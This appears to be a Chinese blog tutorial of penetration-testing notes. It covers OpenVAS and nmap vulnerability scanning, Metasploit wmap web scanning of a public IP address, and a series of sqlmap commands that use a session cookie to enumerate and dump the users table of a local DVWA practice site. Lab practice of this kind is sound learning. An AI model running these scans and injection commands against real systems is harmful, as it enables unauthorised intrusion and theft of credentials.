网络漏洞扫描

OpenVAS漏洞扫描器

安装OpenVAS

apt-get install openvas

安装配置OpenVAS

openvas-setup

接下来参考
https://www.cnblogs.com/zlslch/p/6872559.html

Metasploit内部使用OpenVAS

查找特定服务漏洞

使用Nmap查找MS08-067漏洞

nmap -P0 --script=smb-vuln-ms08-067.nse 10.10.10.130

基于Metasploit框架的Web应用渗透技术

// 初始化wmap
db_connect -y /opt/metasploit-4.14.0/config/database.yml
load wmap
help
wmap_sites -a http://202.112.50.74

// 使用wmap进行扫描
wmap_targets -a http://202.112.50.74
wmap_sites -l
wmap_targets -t http://202.112.50.74
wmap_run -t

// 查看wmap扫描结果
wmap_run -e
vluns

sqlmap

安装xampp:https://jingyan.baidu.com/article/adc815138ad0eff723bf7335.html
安装DVWA:https://jingyan.baidu.com/article/0eb457e53b72a003f1a90536.html
出错解决:
http://blog.csdn.net/XavierDarkness/article/details/75040716
http://blog.csdn.net/XavierDarkness/article/details/75041872
tamper data安装与使用:http://blog.csdn.net/yu422560654/article/details/7827421

Sql注入漏洞

接下来主要参考
http://blog.csdn.net/youb11/article/details/45719423

在输入框中随便输入数据,提交后,可以在Tamper data中看到Cookie等数据
这里写图片描述

因为sqlmap扫描要重定向要认证页面,所以需要当前会话cookie,才能在此页面上继续扫描

注入攻击

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' 

获得数据库名

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' --dbs

获取数据库dvwa的表名

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' -D dvwa --tables

获取数据库dvwa表users的列名

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' -D dvwa --tables -T users --column

获取字段内容

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=a5043849f83a11b0926cb0a1a3a0fc0e#' --cookie='security=low; PHPSESSID=a69f819fc79c2b2ecea49bc70706567d' -D dvwa --tables -T users --column --dump

参考
《Metasploit 魔鬼训练营》
https://www.cnblogs.com/justforfun12/p/5209502.html
http://blog.csdn.net/youb11/article/details/45719423

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值